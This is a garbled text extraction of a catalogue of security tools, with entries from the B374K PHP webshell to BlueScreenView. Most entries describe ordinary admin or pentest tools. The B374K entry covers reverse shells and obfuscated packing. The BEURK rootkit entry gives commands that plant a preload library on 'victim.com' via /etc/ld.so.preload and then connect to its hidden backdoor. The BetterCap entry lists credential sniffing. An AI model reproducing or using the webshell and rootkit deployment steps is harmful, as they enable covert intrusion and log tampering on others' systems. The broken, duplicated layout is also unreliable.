B374K - PHP WEBSHELL WITH HANDY FEATURES
This PHP Shell is a useful tool for system or web administrator

to do remote management without using cpanel, connecting
using ssh, ftp etc. All actions take place within a web browser.
Features :
File manager (view, edit, rename, delete, upload,

download, archiver, etc)
Search file, file content, folder (also using regex)
Command execution
Script execution (php, perl, python, ruby, java, node.js, c)
Give you shell via bind/reverse shell connect
Simple packet crafter
Connect to DBMS (mysql, mssql, oracle, sqlite,
postgresql, and many more using ODBC or PDO)
SQL Explorer
Process list/Task manager
Send mail with attachment (you can attach local file on
server)
String conversion
All of that only in 1 file, no installation needed

Support PHP > 4.3.3 and PHP 5
Requirements :
PHP version > 4.3.3 and PHP 5

As it using zepto.js v1.1.2, you need modern browser to
use b374k shell. See browser support on zepto.js website
http://zeptojs.com/
Responsibility of what you do with this shell
Installation :
Download b374k.php (default password : b374k), edit and

change password and upload b374k.php to your server,
password is in sha1(md5()) format. Or create your own
b374k.php, explained below
Customize :
After finished doing editing with files, upload index.php, base,

module, theme and all files inside it to a server
Using Web Browser :
Open index.php in your browser, quick run will only run the
shell. Use packer to pack all files into single PHP file. Set all the
options available and the output file will be in the same
directory as index.php
Using Console :
$ php -f index.php
b374k shell packer 0.4
options :
-o filename
save as
-p password
protect
filename
with password
-t theme
use
theme to
-m modules
modules
to pack separated by comma

-s
strip
comments and whitespaces

-b
encode
with base64
-z [no|gzdeflate|gzencode|gzcompress]
compression (use only with -b)
-c [0-9]
level of
compression
-l
list
available modules
-k
list
available themes
example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b
-z gzcompress -c 9
Don't forget to delete index.php, base, module, theme and all

files inside it after you finished. Because it is not protected with
password so it can be a security threat to your server
Download B374K
BABUN - A WINDOWS SHELL YOU WILL LOVE!
Would you like to use a linux-like console on a Windows host

without a lot of fuzz? Try out babun!
Installation
Just download the dist file from http://babun.github.io, unzip it

and run the install.bat script. After a few minutes babun starts
automatically. The application will be installed to the
%USER_HOME%\.babun directory. Use the /target option to install
babun to a custom directory.
Features in 10 seconds
Babun features the following:

Pre-configured Cygwin with a lot of addons
Silent command-line installer, no admin rights required
pact - advanced package manager (like apt-get or yum)
xTerm-256 compatible console
HTTP(s) proxying support
Plugin-oriented architecture
Pre-configured git and shell
Integrated oh-my-zsh
Auto update feature
"Open Babun Here" context menu entry
Features in 3 minutes
Cygwin
The core of Babun consists of a pre-configured Cygwin. Cygwin
is a great tool, but theres a lot of quirks and tricks that makes
you lose a lot of time to make it actually usable. Not only does
babun solve most of these problems, but also contains a lot of
vital packages, so that you can be productive from the very first
minute.
Package manager
Babun provides a package manager called pact. It is similar to
apt-get or yum. Pact enables installing/searching/upgrading
and deinstalling cygwin packages with no hassle at all. Just
invoke pact --help to check how to use it.
Shell
Babuns shell is tweaked in order to provide the best possible
user-experience. There are two shell types that are preconfigured and available right away - bash and zsh (zsh is the
default one). Babuns shell features:
syntax highlighting
UNIX tools
software development tools
git-aware prompt
custom scripts and aliases
and much more!
Console
Mintty is the console used in babun. It features an xterm-256
mode, nice fonts and simply looks great!
Proxying
Babun supports HTTP proxying out of the box. Just add the
address and the credentials of your HTTP proxy server to
the .babunrc file located in your home folder and execute
source .babunrc to enable HTTP proxying. SOCKS proxies
are not supported for now.
Developer tools
Babun provides many packages, convenience tools and scripts
that make your life much easier. The long list of features
includes:
programming languages (Python, Perl, etc.)
git (with a wide variety of aliases and tweaks)
UNIX tools (grep, wget, curl, etc.)
vcs (svn, git)
oh-my-zsh
custom scripts (pbcopy, pbpaste, babun, etc.)
Plugin architecture
Babun has a very small microkernel (cygwin, a couple of bash
scripts and a bit of a convention) and a plugin architecture on
the top of it. It means that almost everything is a plugin in the
babuns world! Not only does it structure babun in a clean way,
but also enables others to contribute small chunks of code.
Currently, babun comprises the following plugins:
cacert
core
git
oh-my-zsh
pact
cygdrive
dist
shell
Auto-update
Self-update is at the very heart of babun! Many Cygwin tools
are simple bash scripts - once you install them there is no
chance of getting the newer version in a smooth way. You
either delete the older version or overwrite it with the newest
one losing all the changes you have made in between.
Babun contains an auto-update feature which enables updating
both the microkernel, the plugins and even the underlying
cygwin. Files located in your home folder will never be deleted
nor overwritten which preserves your local config and
customizations.
Installer
Babun features an silent command-line installation script that
may be executed without admin rights on any Windows hosts.
Using babun
Setting up proxy
To setup proxy uncomment following lines in the .babunrc file
(%USER_HOME%\.babun\cygwin\home\USER\.babunrc)
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost
Setting up git
Babun has a pre-configured git. The only thing you should do

after the installation is to add your name and email to the git
config:
git config --global user.name "your name"
git config --global user.email "your@email.com"
Theres a lot of great git aliases provided by the git plugin:

gitalias['alias.cp']='cherry-pick'
gitalias['alias.st']='status -sb'
gitalias['alias.cl']='clone'
gitalias['alias.ci']='commit'
gitalias['alias.co']='checkout'
gitalias['alias.br']='branch'
gitalias['alias.dc']='diff --cached'
gitalias['alias.lg']="log --graph --pretty=format:'%Cred
%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %Cblue<
%an>%Creset' --abbrev-commit --date=relative --all"
gitalias['alias.last']='log -1 --stat'
gitalias['alias.unstage']='reset HEAD --'
Installing and removing packages

Babun is shipped with pact - a Linux like package manager. It
uses the cygwin repository for downloading packages:
{ ~ } pact install arj
~
Working directory is /setup
Mirror is http://mirrors.kernel.org/sourceware/cygwin/
setup.ini taken from the cache
Installing arj
Found package arj
--2014-03-30 19:34:38--
http://mirrors.kernel.org/
sourceware/cygwin//x86/release/arj/arj-3.10.22-1.tar.bz2
Resolving mirrors.kernel.org (mirrors.kernel.org)...
149.20.20.135, 149.20.4.71,
2001:4f8:1:10:0:1994:3:14, ...
Connecting to mirrors.kernel.org (mirrors.kernel.org)|
149.20.20.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189944 (185K) [application/x-bzip2]
Saving to: àrj-3.10.22-1.tar.bz2'
100%[=======================================>] 189,944
193K/s
in 1.0s
2014-03-30 19:34:39 (193 KB/s) - àrj-3.10.22-1.tar.bz2'

saved [189944/189944]
Unpacking...
Package arj installed
Heres the list of all pacts features:

{ ~ }
pact --help
pact: Installs and removes Cygwin packages.

Usage:
"pact install <package names>" to install given
packages
"pact remove <package names>" to remove given packages
"pact update <package names>" to update given packages
"pact show" to show installed packages
"pact find <patterns>" to find packages matching
patterns
"pact describe <patterns>" to describe packages
matching patterns
"pact packageof <commands or files>" to locate parent
packages
"pact invalidate" to invalidate pact caches (setup.ini,
etc.)
Options:
--mirror, -m <url> : set mirror
--invalidate, -i
: invalidates pact caches
(setup.ini, etc.)
--force, -f : force the execution
--help
--version
Changing the default shell

The zsh (with .oh-my-zsh) is the default babuns shell.
Executing the following command will output your default shell:
{ ~ } babun shell
~
/bin/zsh
In order to change your default shell execute:

{ ~ } babun shell /bin/bash
~
/bin/zsh
/bin/bash
The output contains two lines: the previous default shell and the
new default shell
Checking the configuration
Execute the following command the check the configuration:

{ ~ }
babun check
~
Executing babun check
Prompt speed
[OK]
Connection check
[OK]
Update check
[OK]
Cygwin check
[OK]
By executing this command you can also check whether there

is a newer cygwin version available:
{ ~ }
babun check
~
Prompt speed
[OK]
Connection check
[OK]
Update check
[OK]
Cygwin check
[OUTDATED]
Hint: the underlying Cygwin kernel is outdated. Execute

'babun update' and follow the instructions!
It will check if there are problems with the speed of the git
prompt, if theres access to the Internet or finally if you are
running the newest version of babun.
The command will output hints if problems occur:
{ ~ } babun check
~
Prompt speed
[SLOW]
Hint: your prompt is very slow. Check the installed

'BLODA' software.
Connection check
[OK]
Update check
[OK]
Cygwin check
[OK]
On each startup, but only every 24 hours, babun will execute

this check automatically. You can disable the automatic check
in the ~/.babunrc file.
Tweaking the configuration
You can tweak some config options in the ~/.babunrc file.
Heres the full list of variables that may be modified:
# JVM options
export JAVA_OPTS="-Xms128m -Xmx256m"
# Modify these lines to set your locale
export LANG="en_US.UTF-8"
export LC_CTYPE="en_US.UTF-8"
export LC_ALL="en_US.UTF-8"
# Uncomment these lines to the set your machine's default
locale (and comment out the UTF-8 ones)
# export LANG=$(locale -uU)
# export LC_CTYPE=$(locale -uU)
# export LC_ALL=$(locale -uU)
# Uncomment this to disable daily auto-update & proxy
checks on startup (not recommended!)
# export DISABLE_CHECK_ON_STARTUP="true"
# Uncomment to increase/decrease the check connection
timeout
# export CHECK_TIMEOUT_IN_SECS=4
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost
Updating babun
To update babun to the newest version execute:
babun update
Please note that your local configuration files will not be

overwritten.
The babun update command will also update the underlying
cygwin version if never version is available. In such case babun
will download the new cygwin installer, close itself and start the
cygwin installation process. Once cygwin installation is
completed babun will restart.
Screenshots
Startup screen
Pact - package installation
Pact - package installed
Babun oh-my-zsh - auto-update
VIM syntax highlighting
Nano syntax highlighting
Git aliases - git lg
Git aliases - git st
Shell prompt
Babun update
Open Babun here - Context Menu
DownloadBabun
BACKBOX LINUX 4.2 - UBUNTU-BASED LINUX
DISTRIBUTION PENETRATION TEST AND SECURITY

ASSESSMENT
BackBox is a Linux distribution based on Ubuntu. It has been

developed to perform penetration tests and security
assessments. Designed to be fast, easy to use and provide a
minimal yet complete desktop environment, thanks to its own
software repositories, always being updated to the latest stable
version of the most used and best known ethical hacking tools.
The BackBox Team is pleased to announce the updated
release of BackBox Linux, the version 4.2! This release
includes features such as Linux Kernel 3.16 and Ruby 2.1.
What's new
Preinstalled Linux Kernel 3.16
New Ubuntu 14.04.2 base
Ruby 2.1
Installer with LVM and Full Disk Encryption options
Handy Thunar custom actions
RAM wipe at shutdown/reboot
System improvements
Upstream components
Bug corrections
Performance boost
Improved Anonymous mode
Predisposition to ARM architecture (armhf Debian
packages)
Predisposition to BackBox Cloud platform
New and updated hacking tools: beef-project, crunch,
fang, galleta, jd-gui, metasploit-framework, pasco, pyew,
rifiuti2, setoolkit, theharvester, tor, torsocks, volatility,
weevely, whatweb, wpscan, xmount, yara, zaproxy
System requirements
32-bit or 64-bit processor
512 MB of system memory (RAM)
6 GB of disk space for installation
Graphics card capable of 800600 resolution
DVD-ROM drive or USB port (2 GB)
DownloadBackBox Linux 4.2

ASSESSMENT


What's new

Ruby 2.1
System improvements
Upstream components
Bug corrections
Performance boost
packages)
New and updated hacking tools: beef-project, btscanner,
dirs3arch, metasploit-framework, ophcrack, setoolkit, tor,
weevely, wpscan, etc.
System requirements

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these

instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f

sudo apt-get install linux-image-generic-lts-utopic
linux-headers-generic-lts-utopic linux-signed-imagegeneric-lts-utopic
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backboxdesktop backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework
whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge

ASSESSMENT

The release have some special new features included to keep
BackBox up to date with last developments in security world.
Tools such as OpenVAS and Automotive Analysis will make a
big difference. BackBox 4.4 comes also with Kernel 3.19.

What's new

Ruby 2.1
System improvements
Upstream components
Bug corrections
Performance boost
Automotive Analysis category
packages)
New and updated hacking tools: apktool, armitage, beefproject, can-utils, dex2jar, fimap, jd-gui,metasploitframework, openvas, setoolkit, sqlmap, tor, weevely,
wpscan, zaproxy, etc.
System requirements

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these

instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-vivid linuxheaders-generic-lts-vivid linux-signed-image-generic-ltsvivid

sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backboxdesktop backbox-menu backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework
whatweb wpscan setoolkit --reinstallsudo apt-get
autoremove --purge
sudo apt-get install openvas sqlite3
sudo openvas-launch sync
sudo openvas-launch start

BACULA - NETWORK BACKUP TOOL FOR LINUX, UNIX,
MAC, AND WINDOWS
Bacula is a set of computer programs that permits the system

administrator to manage backup, recovery, and verification of
computer data across a network of computers of different kinds.
Bacula can also run entirely upon a single computer and can
backup to various types of media, including tape and disk.
In technical terms, it is a network Client/Server based backup
program. Bacula is relatively easy to use and efficient, while
offering many advanced storage management features that
make it easy to find and recover lost or damaged files. Due to
its modular design, Bacula is scalable from small single

computer systems to systems consisting of hundreds of
computers located over a large network.
Who Needs Bacula?
If you are currently using a program such as tar, dump, or bru

to backup your computer data, and you would like a network
solution, more flexibility, or catalog services, Bacula will most
likely provide the additional features you want. However, if you
are new to Unix systems or do not have offsetting experience
with a sophisticated backup package, the Bacula project does
not recommend using Bacula as it is much more difficult to
setup and use than tar or dump.
If you want Bacula to behave like the above mentioned simple
programs and write over any tape that you put in the drive, then
you will find working with Bacula difficult. Bacula is designed to
protect your data following the rules you specify, and this
means reusing a tape only as the last resort. It is possible to
force Bacula to write over any tape in the drive, but it is easier
and more efficient to use a simpler program for that kind of
operation.
If you would like a backup program that can write to multiple
volumes (i.e. is not limited by your tape drive capacity), Bacula
can most likely fill your needs. In addition, quite a number of
Bacula users report that Bacula is simpler to setup and use
than other equivalent programs.
If you are currently using a sophisticated commercial package
such as Legato Networker. ARCserveIT, Arkeia, or
PerfectBackup+, you may be interested in Bacula, which
provides many of the same features and is free software
available under the GNU Version 2 software license.
Bacula Components or Services
Bacula is made up of the following five major components or

services: Director, Console, File, Storage, and Monitor
services.
Bacula Director
The Bacula Director service is the program that supervises all
the backup, restore, verify and archive operations. The system
administrator uses the Bacula Director to schedule backups
and to recover files. For more details see the Director Services
Daemon Design Document in the Bacula Developers Guide.
The Director runs as a daemon (or service) in the background.
Bacula Console
The Bacula Console service is the program that allows the
administrator or user to communicate with the Bacula Director
Currently, the Bacula Console is available in three versions:
text-based console interface, QT-based interface, and a
wxWidgets graphical interface. The first and simplest is to run
the Console program in a shell window (i.e. TTY interface).
Most system administrators will find this completely adequate.
The second version is a GNOME GUI interface that is far from
complete, but quite functional as it has most the capabilities of
the shell Console. The third version is a wxWidgets GUI with an
interactive file restore. It also has most of the capabilities of the
shell console, allows command completion with tabulation, and
gives you instant help about the command you are typing. For
more details see the Bacula Console Design
Document_ConsoleChapter.
Bacula File
The Bacula File service (also known as the Client program) is
the software program that is installed on the machine to be

backed up. It is specific to the operating system on which it
runs and is responsible for providing the file attributes and data
when requested by the Director. The File services are also
responsible for the file system dependent part of restoring the
file attributes and data during a recovery operation. For more
details see the File Services Daemon Design Document in the
Bacula Developers Guide. This program runs as a daemon on
the machine to be backed up. In addition to Unix/Linux File
daemons, there is a Windows File daemon (normally distributed
in binary format). The Windows File daemon runs on current
Windows versions (NT, 2000, XP, 2003, and possibly Me and
98).
Bacula Storage
The Bacula Storage services consist of the software programs
that perform the storage and recovery of the file attributes and
data to the physical backup media or volumes. In other words,
the Storage daemon is responsible for reading and writing your
tapes (or other storage media, e.g. files). For more details see
the Storage Services Daemon Design Document in the Bacula
Developers Guide. The Storage services runs as a daemon on
the machine that has the backup device (usually a tape drive).
Catalog
The Catalog services are comprised of the software programs
responsible for maintaining the file indexes and volume
databases for all files backed up. The Catalog services permit
the system administrator or user to quickly locate and restore
any desired file. The Catalog services sets Bacula apart from
simple backup programs like tar and bru, because the catalog
maintains a record of all Volumes used, all Jobs run, and all
Files saved, permitting efficient restoration and Volume
management. Bacula currently supports three different
databases, MySQL, PostgreSQL, and SQLite, one of which

must be chosen when building Bacula.
The three SQL databases currently supported (MySQL,
PostgreSQL or SQLite) provide quite a number of features,
including rapid indexing, arbitrary queries, and security.
Although the Bacula project plans to support other major SQL
databases, the current Bacula implementation interfaces only to
MySQL, PostgreSQL and SQLite. For the technical and porting
details see the Catalog Services Design Document in the
developers documented.
The packages for MySQL and PostgreSQL are available for
several operating systems. Alternatively, installing from the
source is quite easy, see the Installing and Configuring
MySQLMySqlChapter chapter of this document for the details.
For more information on MySQL, please see:
www.mysql.comhttp://www.mysql.com. Or see the Installing
and Configuring PostgreSQLPostgreSqlChapter chapter of this
document for the details. For more information on PostgreSQL,
please see: www.postgresql.orghttp://www.postgresql.org.
Configuring and building SQLite is even easier. For the details
of configuring SQLite, please see the Installing and Configuring
SQLiteSqlLiteChapter chapter of this document.
Bacula Monitor
A Bacula Monitor service is the program that allows the
administrator or user to watch current status of Bacula
Directors, Bacula File Daemons and Bacula Storage Daemons.
Currently, only a GTK+ version is available, which works with
GNOME, KDE, or any window manager that supports the
FreeDesktop.org system tray standard.
To perform a successful save or restore, the following four
daemons must be configured and running: the Director
daemon, the File daemon, the Storage daemon, and the
Catalog service (MySQL, PostgreSQL or SQLite).
DownloadBacula
BEESWARM - ACTIVE IDS MADE EASY
Beeswarm is an active IDS project that provides easy

configuration, deployment and management of honeypots and
clients. The system operates by luring the hacker into the
honeypots by setting up a deception infrastructure where

deployed drones communicate with honeypots and intentionally
leak credentials while doing so. The project has been release in
a beta version, a stable version is expected within three
months.
Installing and starting the server
On the VM to be set up as the server, perform the following

steps. Make sure to write down the administrative password.
$ sudo apt-get install libffi-dev build-essential pythondev python-pip libssl-dev libxml2-dev libxslt1-dev
$ pip install pydes --allow-external pydes --allowunverified pydes
$ pip install beeswarm
Downloading/unpacking beeswarm
...
Successfully installed Beeswarm
Cleaning up...
$ mkdir server_workdir
$ cd server-workdir/
$ beeswarm --server
...
*********************************************************
*******************
Default password for the admin account is: uqbrlsabeqpbwy
*********************************************************
*******************
...
Download Beeswarm
BETTERCAP - A COMPLETE, MODULAR, PORTABLE AND

EASILY EXTENSIBLE MITM FRAMEWORK
BetterCap is an attempt to create a complete, modular, portable

and easily extensible MITM framework with every kind of
features could be needed while performing a man in the middle
attack.
It's currently able to sniff and print from the network the
following informations:
URLs being visited.
HTTPS host being visited.
HTTP POSTed data.
FTP credentials.
IRC credentials.
POP, IMAP and SMTP credentials.
NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
DEPENDS
colorize (gem install colorize)

packetfu (gem install packetfu)
pcaprub (gem install pcaprub) [sudo apt-get install rubydev libpcap-dev]
DownloadBetterCap
BEURK - EXPERIMENTAL UNIX ROOTKIT
BEURK is an userland preload rootkit for GNU/Linux, heavily
focused around anti-debugging and anti-detection.
NOTE:BEURKis a recursive acronym
forBEURKExperimentalUnixRootKit
Features
Hide attacker files and directories

Realtime log cleanup (on utmp/wtmp )
Anti process and login detection
Bypass unhide, lsof, ps, ldd, netstat analysis
Furtive PTY backdoor client
Upcoming features
ptrace(2) hooking for anti-debugging

libpcap hooking undermines local sniffers
PAM backdoor for local privilege escalation
Usage
Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/
ld.so.preload'
Enjoy !
./client.py victim_ip:port # connect with furtive
backdoor
Dependencies
The following packages are not required in order to build

BEURK at the moment:
libpcap - to avoid local sniffing
libpam - for local PAM backdoor
libssl - for encrypted backdoor connection
Example on debian:
apt-get install libpcap-dev libpam-dev libssl-dev
Download Beurk
BLACKARCH LINUX V2015.07.31 - PENETRATION
TESTING DISTRIBUTION
BlackArch Linux is an Arch Linux-based distribution for

penetration testers and security researchers. The repository
contains 1239 tools. You can install tools individually or in
groups. BlackArch Linux is compatible with existing Arch
installs.
The new ISOs include over 1230 tools for i686 and x86_64 and
over 1010 tools. For more details see the ChangeLog below.

Changelogv2015.07.31
added more than 30 new tools

updated system packages including linux kernel 4.1.3
updated all tools
added new color config for vim
replace splash.png
deleted blackarch-install.txt
updated /root/README
fixed typos in ISO config files
DownloadBlackArch Linux v2015.07.31

BLACKARCH LINUX V2015.11.24 - PENETRATION
TESTING DISTRIBUTION
BlackArch Linux is an Arch Linux-based distribution for

penetration testers and security researchers. The repository
contains 1308 tools. You can install tools individually or in
groups. BlackArch Linux is compatible with existing Arch
installs.
The BlackArch Live ISO contains multiple window managers.
ChangeLog v2015.11.24:
added more than 100 new tools

updated system packages
include linux kernel 4.2.5
updated all tools
updated menu entries for window managers
added (correct) multilib support
added more fonts
added missing group 'vboxsf'
DownloadBlackArch Linux v2015.11.24

BLACKBONE - WINDOWS MEMORY HACKING LIBRARY
Blackbone, Windows Memory Hacking Library
Features
x86 and x64 support

Process interaction
Manage PEB32/PEB64
Manage process through WOW64 barrier
Process Memory
Allocate and free virtual memory
Change memory protection
Read/Write virtual memory
Process modules
Enumerate all (32/64 bit) modules loaded.
Enumerate modules using Loader list/Section
objects/PE headers methods.
Get exported function address
Get the main module
Unlink module from loader lists
Inject and eject modules (including pure IL images)
Inject 64bit modules into WOW64 processes
Manually map native PE images
Threads
Enumerate threads
Create and terminate threads. Support for crosssession thread creation.
Get thread exit code
Get main thread
Manage TEB32/TEB64
Join threads
Suspend and resume threads
Set/Remove hardware breakpoints

Pattern search
Search for arbitrary pattern in local or remote process
Remote code execution
Execute functions in remote process
Assemble own code and execute it remotely
Support for cdecl/stdcall/thiscall/fastcall conventions
Support for arguments passed by value, pointer or
reference, including structures
FPU types are supported
Execute code in new thread or any existing one
Remote hooking
Hook functions in remote process using int3 or
hardware breakpoints
Hook functions upon return
Manual map features
x86 and x64 image support
Mapping into any arbitrary unprotected process
Section mapping with proper memory protection flags
Image relocations (only 2 types supported. I haven't
seen a single PE image with some other relocation
types)
Imports and Delayed imports are resolved
Bound import is resolved as a side effect, I think
Module exports
Loading of forwarded export images
Api schema name redirection
SxS redirection and isolation
Activation context support
Dll path resolving similar to native load order
TLS callbacks. Only for one thread and only with
PROCESS_ATTACH/PROCESS_DETACH reasons.
Static TLS
Exception handling support (SEH and C++)
Adding module to some native loader structures(for
basic module api support: GetModuleHandle,
GetProcAdress, etc.)
Security cookie initialization
C++/CLI images are supported
Image unloading
Increase reference counter for import libraries in case
of manual import mapping
Cyclic dependencies are handled properly
Driver features
Allocate/free/protect user memory
Read/write user and kernel memory
Disable permanent DEP for WOW64 processes
Change process protection flag
Change handle access rights
Remap process memory
Hiding allocated user-mode memory
User-mode dll injection and manual mapping
Manual mapping of drivers
DownloadBlackbone
BLUEMAHO - BLUETOOTH SECURITY TESTING SUITE
BlueMaho is GUI-shell (interface) for suite of tools for testing

security of bluetooth devices. It is freeware, opensource, written
on python, uses wxPyhon. It can be used for testing BT-devices
for known vulnerabilities and major thing to do - testing to find
unknown vulns. Also it can form nice statistics.

What it can do? (features)
scan for devices, show advanced info, SDP records,

vendor etc
track devices - show where and how much times device
was seen, its name changes
loop scan - it can scan all time, showing you online
devices
alerts with sound if new device found
on_new_device - you can spacify what command should it
run when it founds new device
it can use separate dongles - one for scaning (loop scan)
and one for running tools or exploits
send files
change name, class, mode, BD_ADDR of local HCI
devices
save results in database
form nice statistics (uniq devices by day/hour, vendors,
services etc)
test remote device for known vulnerabilities (see exploits
for more details)
test remote device for unknown vulnerabilities (see tools
for more details)
themes! you can customize it
What tools and exploits it consist of?
Tools:
atshell.c by Bastian Ballmann (modified attest.c by Marcel
Holtmann)
bccmd by Marcel Holtmann
bdaddr.c by Marcel Holtmann
bluetracker.py by smiley
carwhisperer v0.2 by Martin Herfurt
psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin
R. Mulliner
BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
btftp v0.1 by Marcel Holtmann
btobex v0.1 by Marcel Holtmann
greenplaque v1.5 by digitalmunition.com
L2CAP packetgenerator by Bastian Ballmann
obex stress tests 0.1
redfang v2.50 by Ollie Whitehouse
ussp-push v0.10 by Davide Libenzi
exploits/attacks:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Mode 3 abuse attack
Nokia N70 l2cap packet DoS PoC Pierre Betouin
opush abuse (prompts flood) DoS attack
Sony-Ericsson reset display PoC by Pierre Betouin
you can add your own tools by editing 'exploits/exploits.lst'
and 'tools/tools.lst'
Requirements
OS (tested with Debian 4.0 Etch / 2.6.18)

python (python 2.4 http://www.python.org)
wxPython (python-wxgtk2.6 http://www.wxpython.org)
BlueZ (3.9/3.24) http://www.bluez.org
Eterm to open tools somewhere, you can set another term

in 'config/defaul.conf' changing the value of 'cmd_term'
variable. (tested with 1.1 ver)

p k g - c o n fi g ( 0 . 2 1 ) , ' t e e ' u s e d i n t o o l s /
showmaxlocaldevinfo.sh, openobex, obexftp
libopenobex1 + libopenobex-dev (needed by ussp-push)
libxml2, libxml2-dev (needed by btftp)
libusb-dev (needed by bccmd)
libreadline5-dev (needed by atshell.c)
lightblue-0.3.3 (needed by obexstress.py)
hardware: any bluez compatible bluetooth-device
Download BlueMaho
BLUESCREENVIEW - BLUE SCREEN OF DEATH (STOP
ERROR) INFORMATION IN DUMP FILES
BlueScreenView scans all your minidump files created during

'blue screen of death' crashes, and displays the information
about all crashes in one table. For each crash, BlueScreenView
displays the minidump filename, the date/time of the crash, the
basic crash information displayed in the blue screen (Bug
Check Code and 4 parameters), and the details of the driver or

module that possibly caused the crash (filename, product
name, file description, and file version).
For each crash displayed in the upper pane, you can view the
details of the device drivers loaded during the crash in the
lower pane. BlueScreenView also mark the drivers that their
addresses found in the crash stack, so you can easily locate
the suspected drivers that possibly caused the crash.
Features
Automatically scans your current minidump folder and

displays the list of all crash dumps, including crash dump
date/time and crash details.
Allows you to view a blue screen which is very similar to
the one that Windows displayed during the crash.
BlueScreenView enumerates the memory addresses
inside the stack of the crash, and find all drivers/modules
that might be involved in the crash.
BlueScreenView also allows you to work with another
instance of Windows, simply by choosing the right
minidump folder (In Advanced Options).
BlueScreenView automatically locate the drivers appeared
in the crash dump, and extract their version resource
information, including product name, file version,
company, and file description.
Using BlueScreenView
BlueScreenView doesn't require any installation process or

executable file - BlueScreenView.exe
After running BlueScreenView, it automatically scans your
MiniDump folder and display all crash details in the upper pane.
Crashes Information Columns (Upper Pane)
Dump File: The MiniDump filename that stores the crash

data.
Crash Time: The created time of the MiniDump filename,
which also matches to the date/time that the crash
occurred.
Bug Check String: The crash error string. This error string
is determined according to the Bug Check Code, and it's
also displayed in the blue screen window of Windows.
Bug Check Code: The bug check code, as displayed in
the blue screen window.
Parameter 1/2/3/4: The 4 crash parameters that are also
displayed in the blue screen of death.
Caused By Driver: The driver that probably caused this
crash. BlueScreenView tries to locate the right driver or
module that caused the blue screen by looking inside the
crash stack. However, be aware that the driver detection
mechanism is not 100% accurate, and you should also
look in the lower pane, that display all drivers/modules
found in the stack. These drivers/modules are marked in
pink color.
Caused By Address: Similar to 'Caused By Driver' column,
but also display the relative address of the crash.
File Description: The file description of the driver that
probably caused this crash. This information is loaded
from the version resource of the driver.
Product Name: The product name of the driver that
probably caused this crash. This information is loaded
from the version resource of the driver.
Company: The company name of the driver that probably
caused this crash. This information is loaded from the
version resource of the driver.
File Version: The file version of the driver that probably
caused this crash. This information is loaded from the
Crash Address:The memory address that the crash
occurred. (The address in the EIP/RIP processor register)
In some crashes, this value might be identical to 'Caused

By Address' value, while in others, the crash address is
different from the driver that caused the crash.
Stack Address 1 - 3: The last 3 addresses found in the call
stack. Be aware that in some crashes, these values will be
empty. Also, the stack addresses list is currently not
supported for 64-bit crashes.
Drivers Information Columns (Lower Pane)
Filename: The driver/module filename

Address In Stack: The memory address of this driver that
was found in the stack.
From Address: First memory address of this driver.
To Address: Last memory address of this driver.
Size: Driver size in memory.
Time Stamp: Time stamp of this driver.
Time String: Time stamp of this driver, displayed in date/
time format.
Product Name: Product name of this driver, loaded from
the version resource of the driver.
File Description: File description of this driver, loaded from
the version resource of the driver.
File Version: File version of this driver, loaded from the
Company: Company name of this driver, loaded from the
Full Path: Full path of the driver filename.
Lower Pane Modes
Currently, the lower pane has 4 different display modes. You

can change the display mode of the lower pane from Options>Lower Pane Mode menu.
1. All Drivers: Displays all the drivers that were loaded during
the crash that you selected in the upper pane. The drivers/
module that their memory addresses found in the stack,
are marked in pink color.

2. Only Drivers Found In Stack: Displays only the modules/
drivers that their memory addresses found in the stack of
the crash. There is very high chance that one of the
drivers in this list is the one that caused the crash.
3. Blue Screen in XP Style: Displays a blue screen that looks
very similar to the one that Windows displayed during the
crash.
4. DumpChk Output: Displays the output of Microsoft
DumpChk utility. This mode only works when Microsoft
DumpChk is installed on your computer and
BlueScreenView is configured to run it from the right folder
(In the Advanced Options window).
/
LoadFrom
<Source>
Specifies the source to load from.

1 -> Load from a single MiniDump folder (/
MiniDumpFolder parameter)
2 -> Load from all computers specified in the
computer list file. (/ComputersFile parameter)
3 -> Load from a single MiniDump file (/
SingleDumpFile parameter)
/
MiniDump
Folder
<Folder>
Start BlueScreenView with the specified

MiniDump folder.
/
SingleDu
mpFile
<Filename
>

MiniDump file. (For using with /LoadFrom 3)
/
Computer
sFile
<Filename
>
Specifies the computers list filename. (When

LoadFrom = 2)
/
LowerPan
eMode <1
- 3>

mode. 1 = All Drivers, 2 = Only Drivers Found
In Stack, 3 = Blue Screen in XP Style.
/stext
<Filename
>
Save the list of blue screen crashes into a

regular text file.
/stab
<Filename
>

tab-delimited text file.
/scomma
<Filename
>

/stabular
<Filename
>

tabular text file.
/shtml
<Filename
>
Save the list of blue screen crashes into

HTML file (Horizontal).
/sverhtml
<Filename
>
Save the list of blue screen crashes into

HTML file (Vertical).
/sxml
<Filename
>
Save the list of blue screen crashes into XML

file.
/sort
<column>

column. If you don't specify this option, the list
is sorted according to the last sort that you
